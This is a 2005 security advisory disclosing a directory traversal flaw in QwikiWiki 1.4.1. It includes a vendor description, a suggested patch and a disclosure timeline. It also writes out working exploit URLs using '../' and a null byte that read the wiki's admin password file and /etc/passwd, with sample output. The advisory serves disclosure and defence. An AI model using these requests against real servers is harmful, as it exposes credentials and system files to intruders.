Title: QWikiwiki directory traversal vulnerability Vulnerability discovery: Madelman <madelman AT iname.com> Date: 01/01/2005 Severity: Critical
Summary: - --------
QwikiWiki is driven by one core design goal: simplicity. This design goal is codified into three key principles: ~ Self Sufficiency: QwikiWiki requires only a web server and PHP. ~ Zero-Edit Deployment: QwikiWiki is immediately usable "out of the box". ~ Minimalist Featureset: QwikiWiki is not everything to everybody.
QwikiWiki uses only cookies and the file system, and thus does not require a MySQL server or any other database support. Data is stored in simple text files, and backups are just complete copies of the data directory. Ain't nothing fancier than it need be. (from vendor site: http://www.qwikiwiki.com)
QWikiwiki doesn't check the page parameter which allows reading any file
This vulnerability has been tested with QWikiwiki 1.4.1
Details: - --------
If we want to read the password for QWikiwiki:
REQUEST: http://[SERVER]/qwiki/index.php?page=../_config.php%00 RETURNS: (looking at source of HTML) [...] $QW_CONFIG['title'] = "QwikiWiki"; $QW_CONFIG['adminName'] = "David Barrett"; $QW_CONFIG['adminPassword'] = 'changeme!'
We can also read any file the webserver has permission to:
REQUEST: http://[SERVER]/qwiki/index.php?page=../../../../../../etc/passwd%00 RESPONSE: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh [...]
Solution - --------
Temporary Fix In file _wikiLib.php substitute
function QWCreateDataPath?( $page, $extension ) { return 'data/'. $page . $extension; }
function QWCreateDataPath?( $page, $extension ) { if (strpos($page, "..") === false) { ~ return 'data/'. $page . $extension; } else { ~ return ''; } }
Timeline - --------
01/01/2005 - Vulnerability found 01/01/2005 - Vendor contacted 01/01/2005 - Vendor confirmed bug 04/01/2005 - Bug published in vendor page and advisory released -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.3 (MingW32) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
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